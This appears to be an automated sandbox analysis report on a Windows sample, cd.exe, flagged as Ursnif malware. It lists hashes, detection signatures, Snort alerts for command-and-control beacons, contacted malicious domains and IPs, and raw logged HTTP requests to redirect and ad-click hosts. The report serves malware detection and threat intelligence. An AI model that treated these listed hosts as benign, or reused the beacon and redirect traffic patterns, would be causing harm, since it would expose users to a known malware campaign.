Loading ...

Play interactive tourEdit tour

Windows Analysis Report cd.exe

Overview

General Information

Sample Name:cd.exe
Analysis ID:483177
MD5:cd02e745a08dd29cb6fda1761b2f4b6e
SHA1:1a0dd3348bb0f856fff51f7e22364b0974fa1ad3
SHA256:a4ff2e7dd35e8f7362739c3a578563458548ed5ffb30abe5ec6bf6f2c0de8eb7
Tags:exe
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Found PSEXEC tool (often used for remote process execution)
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Yara detected PsExec sysinternal tool
IP address seen in connection with other malware
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
PE file contains more sections than normal
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cd.exe (PID: 6888 cmdline: 'C:\Users\user\Desktop\cd.exe' MD5: CD02E745A08DD29CB6FDA1761B2F4B6E)
  • iexplore.exe (PID: 4568 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 160 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
cd.exeJoeSecurity_PsExecYara detected PsExec sysinternal toolJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
              Click to see the 5 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: cd.exeReversingLabs: Detection: 60%
              Machine Learning detection for sampleShow sources
              Source: cd.exeJoe Sandbox ML: detected
              Source: 1.2.cd.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
              Source: 1.3.cd.exe.82998c.0.unpackAvira: Label: TR/Patched.Ren.Gen

              Compliance:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\user\Desktop\cd.exeUnpacked PE file: 1.2.cd.exe.400000.0.unpack
              Source: cd.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.102.106:443 -> 192.168.2.6:49751 version: TLS 1.2
              Source: Binary string: D:\a\1\s\Win32\Release\logonsessions.pdb source: cd.exe
              Source: Binary string: c:\stream\develop\Regionhunt.pdb source: cd.exe
              Source: Binary string: D:\a\1\s\Win32\Release\RamMap.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb))) source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb666 source: cd.exe
              Source: Binary string: C:\agent\_work\93\s\Win32\Release\autoruns.pdb source: cd.exe
              Source: Binary string: D:\a\1\s\Win32\Release\adrestore.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb source: cd.exe

              Spreading:

              barindex
              Found PSEXEC tool (often used for remote process execution)Show sources
              Source: cd.exeString found in binary or memory: PsExec executes a program on a remote system, where remotely executed console

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49737 -> 173.239.8.164:80
              Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49737 -> 173.239.8.164:80
              Source: TrafficSnort IDS: 2030821 ET MALWARE Win32/Zonebac Traffic Redirect 192.168.2.6:49737 -> 173.239.8.164:80
              Source: Joe Sandbox ViewASN Name: WEBAIR-INTERNETUS WEBAIR-INTERNETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
              Source: Yara matchFile source: cd.exe, type: SAMPLE
              Source: Joe Sandbox ViewIP Address: 173.192.101.24 173.192.101.24
              Source: Joe Sandbox ViewIP Address: 173.192.101.24 173.192.101.24
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: msapplication.xml0.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
              Source: msapplication.xml0.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
              Source: msapplication.xml5.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
              Source: msapplication.xml5.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
              Source: msapplication.xml7.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
              Source: msapplication.xml7.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
              Source: LM1X3BMT.htm.9.drString found in binary or memory: re currently viewing and your location (ad serving is based on general location). Personalised content and ads can be based on those things and your activity, like Google searches and videos that you watch on YouTube. Personalised content and ads include things like more relevant results and recommendations, a customised YouTube homepage, and ads that are tailored to your interests.</div><div class="yS1nld">Click 'Customise' to review options, including controls to reject the use of cookies for personalisation and information about browser-level controls to reject some or all cookies for other uses. You can also visit <span>g.co/privacytools</span> at any time.</div></div></div></div><div class="VDity"><button class="tHlp8d" id="VnjCcb" data-ved="0ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQiJAHCBo"><div class="jyfHyd" role="none">Customise</div></button><button class="tHlp8d" id="L2AGLb" data-ved="0ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQiZAHCBs"><div class="jyfHyd" role="none">I agree</div></button></div><div class="XWlrff"><style>.XWlrff{margin:20px;display:flex;flex-direction:row;justify-content:center;position:absolute;bottom:0;right:0;left:0}.peRL2e,.o9D5Zb{color:#70757a;text-decoration:none}.o9D5Zb{margin:0 10px}.XWlrff{margin:18px auto 20px;position:relative}@media (max-width:320px){.peRL2e{font-size:11px}}@media (max-height:480px){.XWlrff{margin-bottom:10px}}</style><a class="peRL2e" href="https://policies.google.com/privacy?hl=en-GB&amp;fg=1&amp;utm_source=ucbs" id="RP3V5c" data-ved="0ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQj5AHCBw">Privacy</a><div class="o9D5Zb" aria-hidden="true">&middot;</div><a class="peRL2e" href="https://policies.google.com/terms?hl=en-GB&amp;fg=1&amp;utm_source=ucbs" id="HQ1lb" data-ved="0ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQkJAHCB0">Terms</a></div></div></div></span></div></div><script nonce="sBDQvviEJYE6GoG6F/T2Gw==">(function(){var consentCookiePayload='YES+shp.gws-20210909-0-RC2.en+FX+509';var nidCookiePayload='223\x3dao_PNWYHKNRTKr72m4usLcTnJh9tuvM0SumQjLr2NpAzZjJRtiknK0gCmTBXLOnKGQSjcjc7q7fXQyHh5YsCZxvbJHtqG4tUjigGnPyvRGQzyKRILvDlG4HWUN7F5Jpi_nHXn1ESCCOSvi8kY-pjocaxP4tq4OrC3-8IjbCQNp0';var cookieDomain='.google.com';var cookieUpdateConsentUrl='https://consent.google.com/s?continue\x3dhttps://www.google.com/?gws_rd%3Dssl\x26gl\x3dGB\x26m\x3d0\x26pc\x3dshp\x26uxe\x3dnone\x26v\x3dshp.gws-20210909-0-RC2.en%2BFX%2B509\x26ca\x3de\x26x\x3d5\x26t\x3dADw3F8gQkSzvPQQLJeh4nXGqegxVPXiLSQ:1631628204516';var sIU='https://accounts.google.com/ServiceLogin?hl\x3den\x26continue\x3dhttps://www.google.com/?gws_rd%3Dssl\x26gae\x3dcb-none';var cU='https://consent.google.com/d?continue\x3dhttps://www.google.com/?gws_rd%3Dssl\x26gl\x3dGB\x26m\x3d0\x26pc\x3dshp\x26uxe\x3dnone\x26hl\x3den\x26src\x3d2';var pC='SEARCH_HOMEPAGE';var gL='GB';var isMobile=false;var srp=false; equals www.youtube.com (Youtube)
              Source: LM1X3BMT.htm.9.drString found in binary or memory: http://agoogleaday.com/%23date%3D2011-06-04
              Source: cd.exeString found in binary or memory: http://citationstyles.org/
              Source: cd.exeString found in binary or memory: http://creativecommons.org/licenses/by-sa/3.0/
              Source: ~DFFAD0E470126C2D77.TMP.7.dr, index[1].htm.9.drString found in binary or memory: http://google.com
              Source: 1G7O03DV.htm.9.dr, ~DFFAD0E470126C2D77.TMP.7.drString found in binary or memory: http://menehleibe.com/
              Source: {F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.drString found in binary or memory: http://menehleibe.com/Root
              Source: cd.exeString found in binary or memory: http://p.yusukekamiyamane.com/
              Source: LM1X3BMT.htm.9.drString found in binary or memory: http://schema.org/WebPage
              Source: cd.exeString found in binary or memory: http://support.mendeley.com/customer/portal/articles/227955
              Source: 1G7O03DV.htm.9.drString found in binary or memory: http://ww9.menehleibe.com/
              Source: msapplication.xml.7.drString found in binary or memory: http://www.amazon.com/
              Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drString found in binary or memory: http://www.broofa.com
              Source: msapplication.xml1.7.dr, 0V71R0V5.htm.9.drString found in binary or memory: http://www.google.com/
              Source: msapplication.xml2.7.drString found in binary or memory: http://www.live.com/
              Source: msapplication.xml3.7.drString found in binary or memory: http://www.nytimes.com/
              Source: msapplication.xml4.7.drString found in binary or memory: http://www.reddit.com/
              Source: cd.exeString found in binary or memory: http://www.sysinternals.com
              Source: cd.exeString found in binary or memory: http://www.sysinternals.comFileVersionLegalCopyright
              Source: cd.exeString found in binary or memory: http://www.sysinternals.comWindowPositionSOFTWARE
              Source: cd.exeString found in binary or memory: http://www.sysinternals.comopenConnection
              Source: cd.exeString found in binary or memory: http://www.sysinternals.comopenFolder
              Source: msapplication.xml5.7.drString found in binary or memory: http://www.twitter.com/
              Source: msapplication.xml6.7.drString found in binary or memory: http://www.wikipedia.com/
              Source: msapplication.xml7.7.drString found in binary or memory: http://www.youtube.com/
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://accounts.google.com/ServiceLogin?hl
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://adservice.google.com/adsid/google/ui
              Source: LM1X3BMT.htm.9.dr, rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drString found in binary or memory: https://apis.google.com
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://artsandculture.google.com/partner/museo-reina-sofia
              Source: cd.exeString found in binary or memory: https://citationstyles.org
              Source: cd.exeString found in binary or memory: https://clients2.google.com/service/update2/crxupdate_urlBrowser
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://consent.google.com/d?continue
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://consent.google.com/s?continue
              Source: cd.exeString found in binary or memory: https://crashpad.chromium.org/
              Source: cd.exeString found in binary or memory: https://crashpad.chromium.org/bug/new
              Source: cd.exeString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
              Source: cd.exeString found in binary or memory: https://csl.mendeley.com
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://donate.google.com/checkout?campaignid%3D6420545008435200
              Source: imagestore.dat.9.drString found in binary or memory: https://gertrk.com/favicon.ico
              Source: ~DFFAD0E470126C2D77.TMP.7.drString found in binary or memory: https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.com
              Source: {F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.drString found in binary or memory: https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.comRoot
              Source: cd.exeString found in binary or memory: https://github.com/Juris-M/citeproc-js
              Source: cd.exeString found in binary or memory: https://github.com/citation-style-language/styles
              Source: cd.exeString found in binary or memory: https://ims-na1-stg1.adobelogin.com
              Source: cd.exeString found in binary or memory: https://ims-prod06.adobelogin.com
              Source: cd.exeString found in binary or memory: https://lcs-cops-dev.adobe.io
              Source: cd.exeString found in binary or memory: https://lcs-cops-dev.adobe.iohttps://lcs-cops-stage.adobe.iohttps://lcs-cops.adobe.iohttps://lcs-rob
              Source: cd.exeString found in binary or memory: https://lcs-cops-stage.adobe.io
              Source: cd.exeString found in binary or memory: https://lcs-cops.adobe.io
              Source: cd.exeString found in binary or memory: https://lcs-robs-dev.adobe.io
              Source: cd.exeString found in binary or memory: https://lcs-robs-stage.adobe.io
              Source: cd.exeString found in binary or memory: https://lcs-robs.adobe.io
              Source: cd.exeString found in binary or memory: https://lcs-ulecs-dev.adobe.io
              Source: cd.exeString found in binary or memory: https://lcs-ulecs-stage.adobe.io
              Source: cd.exeString found in binary or memory: https://lcs-ulecs.adobe.io
              Source: cd.exeString found in binary or memory: https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-I
              Source: d4a6d4bd[1].htm.9.drString found in binary or memory: https://mybetterdl.com/aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://ogs.google.com/widget/app/so?bc=1
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://ogs.google.com/widget/callout?prid=19025503
              Source: cd.exeString found in binary or memory: https://plasma.kde.org
              Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://policies.google.com/privacy?hl=en-GB&amp;fg=1&amp;utm_source=ucbs
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://policies.google.com/terms?hl=en-GB&amp;fg=1&amp;utm_source=ucbs
              Source: cd.exeString found in binary or memory: https://rrchnm.org/
              Source: cd.exeString found in binary or memory: https://service.elsevier.com/app/answers/detail/a_id/19601/kw/connectivity/supporthub/mendeley/1setU
              Source: cd.exeString found in binary or memory: https://service.elsevier.com/app/answers/detail/a_id/19611/kw/duplicates/supporthub/mendeley/Yes
              Source: cd.exeString found in binary or memory: https://service.elsevier.com/app/answers/detail/a_id/22094/kw/migrate/supporthub/mendeley/
              Source: cd.exeString found in binary or memory: https://service.elsevier.com/app/contact/supporthub/mendeley?dgcid=Mendeley_Desktop_Help-menu-Contac
              Source: cd.exeString found in binary or memory: https://service.elsevier.com/app/home/supporthub/mendeley/?dgcid=Mendeley_Desktop_Help-menu-FAQ
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://trends.google.com/hottrends
              Source: cd.exeString found in binary or memory: https://www.elsevier.com/legal/elsevier-website-terms-and-conditions
              Source: cd.exeString found in binary or memory: https://www.elsevier.com/legal/privacy-policy
              Source: cd.exeString found in binary or memory: https://www.gmu.edu/
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://www.google.co.uk/intl/en/about/products
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://www.google.com
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://www.google.com/?gws_rd%3Dssl
              Source: ~DFFAD0E470126C2D77.TMP.7.drString found in binary or memory: https://www.google.com/?gws_rd=ssl
              Source: ~DFFAD0E470126C2D77.TMP.7.drString found in binary or memory: https://www.google.com/?gws_rd=ssl_bnm_redirect=http://google.com
              Source: {F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.drString found in binary or memory: https://www.google.com/?gws_rd=ssl_bnm_redirect=http://google.com/?gws_rd=ssl
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://www.google.com/_/og/promos/
              Source: {F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.drString found in binary or memory: https://www.google.com/index.php?url_bnm_redirect=http://google.com/?gws_rd=ssl_bnm_redirect=http://
              Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drString found in binary or memory: https://www.google.com/log?format=json&hasfast=true
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://www.google.com/search?gws_rd%3Dssl%26q%3Dnebulae%26um%3D1%26ie%3DUTF-8%26tbm%3Disch%26csf%3D
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://www.google.com/url?q=https://www.google.com/chrome/download-chrome-for-search/%3Fbrand%3DOKW
              Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
              Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
              Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
              Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.auSrFW-FX90.O/rt=j/m=qabr
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.auSrFW-FX90.O/rt=j/m=qdsh/d=1/ed=1/rs=AA2YrTtiIgpyWC3
              Source: LM1X3BMT.htm.9.drString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.wtXa61WU3WQ.L.X.O/m=qcwid/excm=qaaw
              Source: cd.exeString found in binary or memory: https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding
              Source: cd.exeString found in binary or memory: https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite
              Source: cd.exeString found in binary or memory: https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guides
              Source: cd.exeString found in binary or memory: https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guideshttps://www.mendeley.com
              Source: cd.exeString found in binary or memory: https://www.mendeley.com/library
              Source: cd.exeString found in binary or memory: https://www.mendeley.com?dgcid=Mendeley_Desktop_Help-menu-website
              Source: cd.exeString found in binary or memory: https://www.sysinternals.comntdllRtlInitUnicodeStringNtOpenDirectoryObjectNtQuerySectionNtQueryDirec
              Source: cd.exeString found in binary or memory: https://www.virustotal.com/about/terms-of-service%s
              Source: cd.exeString found in binary or memory: https://www.virustotal.comPOST4e3202fdbe953d628f650229af5b3eb49cd46b2d3bfe5546ae3c5fa48b554e0capikey
              Source: cd.exeString found in binary or memory: https://www.zotero.org/
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: menehleibe.comContent-Length: 12Connection: Keep-AliveCache-Control: no-cacheData Raw: 69 63 3d 30 26 66 62 3d 74 72 75 65 Data Ascii: ic=0&fb=true
              Source: unknownDNS traffic detected: queries for: menehleibe.com
              Source: global trafficHTTP traffic detected: GET /aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2E7_vAN-6p8GpmDZG8TCuTZ6pDoEwlyap2kZsgzB4lH00ug8e5ExIzs-GByJkw_hnoLHWVUL2gXgUyatsBFMaSTc1RQ5RxkQPBqyyTn3ctXNy_0uSHRSxkmOy8VHMc85GIOT4jmse8Hco-FpMlb9RHx56VxjN2QtFN197vLrfkZ9qE509t5aRYfk0fTaZIGwGtVFx6Cjc1It8vKVodI2QoCnLeLuzBqxrSYHinyRIiR6SzTXaBf9PH6fc538M5WEvMvhjauUHGubj961r75KUjKtSXnHatHqEuiyuTMyWjRyjCKMGCurZS8_bcUa4tJgkiTyXdC5k_Q4CBuzEhgKlo_tO4ZCxjCqbxJk5Qzkw_MwwsEKwa-Bh_puw260HEYWHbHAxhhGdlJM-I_t1xxhVv3SQmb2uwb95RlGM7AqpOHVVF6EgPkt4a55MyZVnXuVkgrUl1akVOciihIlqaZoSoe2Ylzr70WFqgr6AhoabQSBzCjuJYNp4gwUYV0VWvRZajmUWO_Vxo8ML-hjUsrPH807AqUmDxuY4v8inEoo-y-qnyU06p2Uh3Pw9YdNYD58IK4CKCGcA-Uam9dcss-T-5Iub4J15H67wFZ2snzzWpWzEKC9XUORoe_dbnEgAhHx_n7Z4tVOYdW5lW6ruDPqaeHc0uzcTU9bgm_in-W2l5vorxPFmQaTFIcy4B5guOnMJ5yZHLQD576xYWbP03aM83dTwE3kMpnzCC1V5B-3hXd5pzfx17GSZUu2KHXImolykrmTazGZKmMBhE5rzai4ARXglTM7lPAlIssdjgnlOgBObVnL6dMrNPV4wycVX3s5OxtJMXedCWE2r5biNOcX3y5Pmw-0BUdBZv7MvlSTP2Fk9AaabOem2Q73GpjsG_dwXVnUc2FH6zZuqWu2Dli66C-XucADfX2tBPlR3prQOfp40mttv00_iCR6q6fLI9QZgGY11WgfO3qdEgV2xwoj0eGTIxBicwTEMicE9X3AYQsCpAEn3pdnGSoQpHTA7Kz9fo94mKnTULy2teQgTesP9hhxLreOeHrbCzwHSSbH-FJZx15JZAYCxI8gV6bvS4IWlDg_vysGgTqrjiFCjhA5kocz54NYxtQVvyXSZspRWMKjI1QYN8ennj2JVFvWfYyzeLbGr1ovqBCtNBvJi2ztcTgBlsW0SM8XIsRgd4QMcWZcycyUPzb9Wd1bDxFTAWmSXH43ynD5UObBi5FyNDw8qKKmoCnfedHiztWYQxKotKUGaKd1m_k2iMIc5SBU1Vi7-MGW4_Mi4WYIzJL61eBLaioPhng2BQ6PDt8aAWdDMho29RkRFHVPIQb3W3nWMGo8srLOHYnfrFRuEDgcm6cqkr2IQD0T7sB-GexA77NdWEi2cdlkkLEB146pQ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mybetterdl.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: p226681.mybetterdl.comCookie: rhid=79630578833
              Source: global trafficHTTP traffic detected: GET /click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: gertrk.com
